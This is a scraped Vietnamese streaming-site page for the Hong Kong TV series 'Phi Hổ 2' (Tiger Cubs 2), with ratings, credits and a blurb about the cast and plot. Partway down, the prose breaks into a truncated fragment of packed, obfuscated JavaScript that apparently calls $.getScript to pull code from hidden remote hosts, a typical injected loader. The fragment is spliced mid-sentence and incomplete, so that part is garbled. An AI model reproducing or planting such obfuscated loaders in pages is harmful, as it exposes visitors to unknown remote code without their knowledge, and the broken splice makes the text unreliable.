Banner C1

Phim

Phi Hổ 2 - Tiger Cubs 2

Xem Phim Phi Hổ 2
667562 lượt xem

10/10 Phim Thuyết MinhPhim Tình CảmPhim Hình Sự Phim Hồng Kông

Đạo Diễn: Lâm Chí Hoa

Thời lượng: 10 Tập

Năm phát hành: 2014

Xem phimXem TrailerTải Phim

4.4
1180 Star | 267 Rates
  • Các Diễn Viên Trong Phim
  • Nội Dung Phim

Xem Phim Phi Hổ 2: Năm 2012 bộ phim Phi Hổ do Tuyên Huyên và Mã Đức Chung đóng vai chính mặc dù cũng gặp nhiều phản đối vì các cảnh bạo lực nhưng đây có thể coi là bộ phim hay nhất của năm do TVB sản xuất. Và trong năm nay bộ phim sẽ quay trở lại với phần 2. Tuy nhiên khi chúng ta xem phim Phi Hổ 2 sẽ chỉ còn gặp Mã Đức Chung chứ không còn gặp Tuyên Huyên nữa vì Chung Gia Hân sẽ thay thế cô ấy đóng vai nữ chính. Phim vẫn sẽ lấy đề tài truy bắt các tội phạm làm chủ đề chính, dù phim vẫn chưa quảng cáo rầm rộ và các nhân vật cũng chưa công khai hết nhưng một số hình ảnh cảnh quay của Chung Gia Hân cho thấy phần 2 này cũng hấp dẫn không kém.

Phi Hổ 2

Xem phim Phi Hổ 2 ta sẽ thấy hình ảnh thê thảm của Gia Hân khi vào vai nội gián thâm nhập vào băng nhóm của Lý Tư Tiệp nhưng bị phát hiện. Sau đó cô đã bị đánh đập, tra tấn dã man còn bị quăng xuống nước. Các cảnh quay này Chung Gia Hân thực hiện rất vất vả vì bản thân cô không biết bơi và rất sợ nước. Dù có người đóng thế nhưng cô gặp không ít khó khăn trong các cảnh quay bắt buộc cô phải đích thân đóng. Xem phim Phi Hổ 2 để ủng hộ cô nàng trong vai diễn mới đầy gian khổ này đồng thời thu thập cho mình thêm một bộ phim hấp dẫn nhé.

Xem phim '\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('$.0(\'2://8.3.1/5/6/7/g.9\');$.0(\'2://b.c.1/a/d.e?f=4\')',17,17,'
  • Trailer Phim
8.8
267
  • Phim Cùng Thể Loại

BÌNH LUẬN PHIM : Phi Hổ 2

Banner C1

User Online
Banner C1
Banner C1